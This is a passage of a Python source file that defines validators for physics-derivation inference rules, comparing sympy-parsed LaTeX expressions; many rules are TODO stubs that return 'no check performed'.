    >>> RHS_of_expr_1_eq_RHS_of_expr_2(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    first, second = latex_dict["input"][0], latex_dict["input"][1]
    result = latex_dict["output"][0]
    diff_inputs = sympy.simplify(first["RHS"] - second["RHS"])
    diff_lhs = sympy.simplify(result["LHS"] - first["LHS"])
    diff_rhs = sympy.simplify(result["RHS"] - second["LHS"])
    logger.info("[trace end " + trace_id + "]")
    if diff_inputs == 0 and diff_lhs == 0 and diff_rhs == 0:
        return "valid"
    return f"input diff is {diff_inputs}\n diff is {diff_lhs}\n diff is {diff_rhs}"
def raise_both_sides_to_power(latex_dict: dict) -> str:
    """
    Validate raising both sides to the power given by the feed:
    ((out_lhs0 == (in_lhs0)**(feed0)) and (out_rhs0 == (in_rhs0)**(feed0)))

    Validation is not implemented yet (TODO), so this always returns
    'no check is performed'.  The previous version carried unreachable
    placeholder code after the return; it has been removed.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> raise_both_sides_to_power(latex_dict)
    'no check is performed'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    logger.info("[trace end " + trace_id + "]")
    return "no check is performed"
def claim_expr_1_equals_expr_2(latex_dict: dict) -> str:
    """
    Validate the claim that two expressions are equal:
    ((in_lhs0 == in_lhs1) and (in_rhs0 == in_rhs1))

    NOTE(review): the predicate above compares the two *input* expressions,
    but the code compares input[0] against output[0] — confirm which pair
    is intended.

    Returns 'valid' when both differences simplify to zero; otherwise a
    message showing the nonzero differences.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> claim_expr_1_equals_expr_2(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    d1 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["LHS"])
    d2 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["RHS"])
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    # bug fix: the RHS diff previously printed str(d1) instead of str(d2)
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def claim_LHS_equals_RHS(latex_dict: dict) -> str:
    """
    Validate the claim that the two sides of one expression are equal:
    (in_lhs0 == in_rhs0)

    Returns 'valid' when RHS - LHS simplifies to zero; otherwise a message
    showing the nonzero difference.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> claim_LHS_equals_RHS(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    expr = latex_dict["input"][0]
    difference = sympy.simplify(expr["RHS"] - expr["LHS"])
    logger.info("[trace end " + trace_id + "]")
    if difference == 0:
        return "valid"
    return "diff is " + str(difference)
def expand_integrand(latex_dict: dict) -> str:
    """
    Placeholder for the 'expand integrand' inference rule.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> expand_integrand(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def function_is_even(latex_dict: dict) -> str:
    """
    Claim that a function is even; colloquially,
    sympy.cos(x)==sympy.cos(-x)
    sympy.cos(x) - sympy.cos(-x) == 0

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> function_is_even(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def function_is_odd(latex_dict: dict) -> str:
    """
    Claim that a function is odd; colloquially,
    sympy.sin(-x) == -sympy.sin(x)
    sympy.sin(-x) - -sympy.sin(x) == 0

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> function_is_odd(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def conjugate_function_X(latex_dict: dict) -> str:
    """
    Conjugate a function; colloquially,
    sympy.conjugate(sympy.I)==-sympy.I
    replace f with f^*; replace $i$ with $-i$

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> conjugate_function_X(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def conjugate_both_sides(latex_dict: dict) -> str:
    """
    Conjugate both sides of an expression; colloquially,
    sympy.conjugate(sympy.I)==-sympy.I
    Apply ^*; replace $i$ with $-i$

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> conjugate_both_sides(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def conjugate_transpose_both_sides(latex_dict: dict) -> str:
    """
    Conjugate-transpose both sides of an expression:
    Apply ^+; replace $i$ with $-i$ and transpose matrices

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> conjugate_transpose_both_sides(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def distribute_conjugate_transpose_to_factors(latex_dict: dict) -> str:
    """
    Distribute the conjugate-transpose across factors:
    Apply ^+; replace $i$ with $-i$ and transpose matrices, rotate bra-ket.
    this is a combination of "distribute conjugate" and then "distribute transpose"

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> distribute_conjugate_transpose_to_factors(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def distribute_conjugate_to_factors(latex_dict: dict) -> str:
    """
    Distribute the conjugate across factors:
    Apply ^*; replace $i$ with $-i$

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> distribute_conjugate_to_factors(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def expand_magnitude_to_conjugate(latex_dict: dict) -> str:
    """
    Expand a squared magnitude into a product with the conjugate:
    replace |f|^2 with ff^*

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> expand_magnitude_to_conjugate(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def replace_scalar_with_vector(latex_dict: dict) -> str:
    r"""
    Promote scalar quantities to vectors.

    Given F = m*a
    Get \vec{F} = m*\vec{a}

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> replace_scalar_with_vector(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def simplify(latex_dict: dict) -> str:
    """
    Placeholder for the 'simplify' inference rule.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> simplify(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def subtract_expr_1_from_expr_2(latex_dict: dict) -> str:
    """
    Subtract one expression from another.

    Instead of creating the inf rule for subtraction,
    write this inf rule in terms of add_expr_1_to_expr_2

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> subtract_expr_1_from_expr_2(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def factor_out_x(latex_dict: dict) -> str:
    """
    Factor the feed variable out of both sides.

    Given a*x + b*x = c*x + d*x
    factor out x
    Get x*(a + b) = (c + d)*x

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('x')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> factor_out_x(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def factor_out_x_from_lhs(latex_dict: dict) -> str:
    """
    Factor the feed variable out of the LHS only.

    Given a*x + b*x = c
    factor out x
    get x*(a + b) = c

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('x')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> factor_out_x_from_lhs(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def factor_out_x_from_rhs(latex_dict: dict) -> str:
    """
    Factor the feed variable out of the RHS only.

    Given a = b*x + c*x
    factor out x
    get a = (b + c)*x

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('x')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> factor_out_x_from_rhs(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def differentiate_with_respect_to(latex_dict: dict) -> str:
    r"""
    Differentiate both sides with respect to the feed variable.

    Given a = b,
    wrt t
    get \frac{d}{dt}a = \frac{d}{dt}b

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('t')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> differentiate_with_respect_to(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def apply_function_to_both_sides_of_expression(latex_dict: dict) -> str:
    """
    Apply the feed function to both sides of an expression;
    given a = b

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> apply_function_to_both_sides_of_expression(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def substitute_LHS_of_two_expressions_into_expr(latex_dict: dict) -> str:
    """
    Substitute the LHS of two expressions into a third expression.

    Validation is not implemented yet (TODO): the inputs are only logged
    at debug level and 'no check performed' is always returned.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> substitute_LHS_of_two_expressions_into_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    logger.debug(str(latex_dict["input"][0]["LHS"]))
    logger.debug(str(latex_dict["input"][0]["RHS"]))
    logger.debug(str(latex_dict["feed"][0]))
    logger.debug(str(latex_dict["output"][0]["LHS"]))
    logger.debug(str(latex_dict["output"][0]["RHS"]))
    return "no check performed"
def substitute_LHS_of_three_expressions_into_expr(latex_dict: dict) -> str:
    """
    Substitute the LHS of three expressions into another expression.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> substitute_LHS_of_three_expressions_into_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def substitute_LHS_of_four_expressions_into_expr(latex_dict: dict) -> str:
    """
    Substitute the LHS of four expressions into another expression.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> substitute_LHS_of_four_expressions_into_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def substitute_LHS_of_five_expressions_into_expr(latex_dict: dict) -> str:
    """
    Substitute the LHS of five expressions into another expression.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> substitute_LHS_of_five_expressions_into_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def substitute_LHS_of_six_expressions_into_expr(latex_dict: dict) -> str:
    """
    Substitute the LHS of six expressions into another expression.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> substitute_LHS_of_six_expressions_into_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def expr_is_equivalent_to_expr_under_the_condition(latex_dict: dict) -> str:
    """
    Claim that two expressions are equivalent under a stated condition.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> expr_is_equivalent_to_expr_under_the_condition(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def change_two_variables_in_expr(latex_dict: dict) -> str:
    """
    Validate a change of two variables: substituting feed[0]->feed[1] and
    feed[2]->feed[3] into the input expression must produce the output
    expression on both sides.

    Returns 'valid' when both differences simplify to zero; otherwise a
    message showing the nonzero differences.  The previous version carried
    an unreachable trailing 'return "no check performed"'; it has been
    removed.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> change_two_variables_in_expr(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    logger.debug(str(latex_dict["input"][0]["LHS"]))
    logger.debug(str(latex_dict["input"][0]["RHS"]))
    logger.debug(str(latex_dict["feed"][0]))
    logger.debug(str(latex_dict["output"][0]["LHS"]))
    logger.debug(str(latex_dict["output"][0]["RHS"]))
    logger.debug("input: " + str(latex_dict["input"]))
    logger.debug("feed: " + str(latex_dict["feed"]))
    logger.debug("output: " + str(latex_dict["output"]))
    d1 = sympy.simplify(
        latex_dict["input"][0]["LHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        latex_dict["input"][0]["RHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        - latex_dict["output"][0]["RHS"]
    )
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def change_three_variables_in_expr(latex_dict: dict) -> str:
    """
    Validate a change of three variables: substituting the feed pairs
    (feed[0]->feed[1], feed[2]->feed[3], feed[4]->feed[5]) into the input
    expression must produce the output expression on both sides.

    Returns 'valid' when both differences simplify to zero; otherwise a
    message showing the nonzero differences.  The previous version carried
    an unreachable trailing 'return "no check performed"'; it has been
    removed.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> change_three_variables_in_expr(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    logger.debug("input: " + str(latex_dict["input"]))
    logger.debug("feed: " + str(latex_dict["feed"]))
    logger.debug("output: " + str(latex_dict["output"]))
    d1 = sympy.simplify(
        latex_dict["input"][0]["LHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        .subs(latex_dict["feed"][4], latex_dict["feed"][5])
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        latex_dict["input"][0]["RHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        .subs(latex_dict["feed"][4], latex_dict["feed"][5])
        - latex_dict["output"][0]["RHS"]
    )
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def change_four_variables_in_expr(latex_dict: dict) -> str:
    """
    Validate a change of four variables: substituting the feed pairs
    (feed[0]->feed[1], ..., feed[6]->feed[7]) into the input expression
    must produce the output expression on both sides.

    Returns 'valid' when both differences simplify to zero; otherwise a
    message showing the nonzero differences.  The previous version carried
    an unreachable trailing 'return "no check performed"'; it has been
    removed.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> change_four_variables_in_expr(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    logger.debug("input: " + str(latex_dict["input"]))
    logger.debug("feed: " + str(latex_dict["feed"]))
    logger.debug("output: " + str(latex_dict["output"]))
    d1 = sympy.simplify(
        latex_dict["input"][0]["LHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        .subs(latex_dict["feed"][4], latex_dict["feed"][5])
        .subs(latex_dict["feed"][6], latex_dict["feed"][7])
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        latex_dict["input"][0]["RHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        .subs(latex_dict["feed"][4], latex_dict["feed"][5])
        .subs(latex_dict["feed"][6], latex_dict["feed"][7])
        - latex_dict["output"][0]["RHS"]
    )
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def change_five_variables_in_expr(latex_dict: dict) -> str:
    """
    Validate a change of five variables: substituting the feed pairs
    (feed[0]->feed[1], ..., feed[8]->feed[9]) into the input expression
    must produce the output expression on both sides.

    Returns 'valid' when both differences simplify to zero; otherwise a
    message showing the nonzero differences.  The previous version carried
    an unreachable trailing 'return "no check performed"'; it has been
    removed.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> change_five_variables_in_expr(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    logger.debug("input: " + str(latex_dict["input"]))
    logger.debug("feed: " + str(latex_dict["feed"]))
    logger.debug("output: " + str(latex_dict["output"]))
    d1 = sympy.simplify(
        latex_dict["input"][0]["LHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        .subs(latex_dict["feed"][4], latex_dict["feed"][5])
        .subs(latex_dict["feed"][6], latex_dict["feed"][7])
        .subs(latex_dict["feed"][8], latex_dict["feed"][9])
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        latex_dict["input"][0]["RHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        .subs(latex_dict["feed"][4], latex_dict["feed"][5])
        .subs(latex_dict["feed"][6], latex_dict["feed"][7])
        .subs(latex_dict["feed"][8], latex_dict["feed"][9])
        - latex_dict["output"][0]["RHS"]
    )
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def change_six_variables_in_expr(latex_dict: dict) -> str:
    """
    Validate a change of six variables: substituting the feed pairs
    (feed[0]->feed[1], ..., feed[10]->feed[11]) into the input expression
    must produce the output expression on both sides.

    Returns 'valid' when both differences simplify to zero; otherwise a
    message showing the nonzero differences.  The previous version carried
    an unreachable trailing 'return "no check performed"'; it has been
    removed.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> change_six_variables_in_expr(latex_dict)
    'valid'
    """
    trace_id = str(random.randint(1000000, 9999999))
    logger.info("[trace start " + trace_id + "]")
    logger.debug("input: " + str(latex_dict["input"]))
    logger.debug("feed: " + str(latex_dict["feed"]))
    logger.debug("output: " + str(latex_dict["output"]))
    d1 = sympy.simplify(
        latex_dict["input"][0]["LHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        .subs(latex_dict["feed"][4], latex_dict["feed"][5])
        .subs(latex_dict["feed"][6], latex_dict["feed"][7])
        .subs(latex_dict["feed"][8], latex_dict["feed"][9])
        .subs(latex_dict["feed"][10], latex_dict["feed"][11])
        - latex_dict["output"][0]["LHS"]
    )
    d2 = sympy.simplify(
        latex_dict["input"][0]["RHS"]
        .subs(latex_dict["feed"][0], latex_dict["feed"][1])
        .subs(latex_dict["feed"][2], latex_dict["feed"][3])
        .subs(latex_dict["feed"][4], latex_dict["feed"][5])
        .subs(latex_dict["feed"][6], latex_dict["feed"][7])
        .subs(latex_dict["feed"][8], latex_dict["feed"][9])
        .subs(latex_dict["feed"][10], latex_dict["feed"][11])
        - latex_dict["output"][0]["RHS"]
    )
    logger.info("[trace end " + trace_id + "]")
    if (d1 == 0) and (d2 == 0):
        return "valid"
    return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def LHS_of_expr_equals_LHS_of_expr(latex_dict: dict) -> str:
    """
    Equate the RHS of two expressions that share the same LHS.

    Given a = b
    and a = d
    get b = d

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')},
                               {'LHS': parse_latex('a'), 'RHS': parse_latex('d')}]
    >>> latex_dict['output'] = [{'LHS': parse_latex('b'), 'RHS': parse_latex('d')}]
    >>> LHS_of_expr_equals_LHS_of_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def square_root_both_sides(latex_dict: dict) -> str:
    r"""
    Take the square root of both sides, producing both branches.

    Given a = b
    sqrt both side
    get sqrt(a) = sqrt(b)
    and sqrt(a) = - sqrt(b)

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
    >>> latex_dict['output'] = [{'LHS': parse_latex('\sqrt{a}'), 'RHS': parse_latex('\sqrt{b}')},
                                {'LHS': parse_latex('\sqrt{a}'), 'RHS': parse_latex('-\sqrt{b}')}]
    >>> square_root_both_sides(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def divide_expr_by_expr(latex_dict: dict) -> str:
    """
    Divide one expression by another, side-by-side.

    Given a = b
    and c = d
    get a/c = b/d

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')},
                               {'LHS': parse_latex('c'), 'RHS': parse_latex('d')}]
    >>> latex_dict['output'] = [{'LHS': parse_latex('a/c'), 'RHS': parse_latex('b/d')}]
    >>> divide_expr_by_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def separate_two_vector_components(latex_dict: dict) -> str:
    r"""
    Split a two-component vector equation into per-component equations.

    Given a_x \hat{x} + a_y \hat{y} = v_x \hat{x} + v_y \hat{y}
    get a_x = v_x
    and a_y = v_y

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> separate_two_vector_components(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def separate_three_vector_components(latex_dict: dict) -> str:
    r"""
    Split a three-component vector equation into per-component equations.

    Given a_x \hat{x} + a_y \hat{y} + a_z \hat{z} = v_x \hat{x} + v_y \hat{y} + v_z \hat{z}
    get a_x = v_x
    and a_y = v_y
    and a_z = v_z

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> separate_three_vector_components(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def separate_vector_into_two_trigonometric_ratios(latex_dict: dict) -> str:
    r"""
    Decompose a vector into two trigonometric ratios.
    Given \vec{v} =
    (description incomplete in the original source)

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
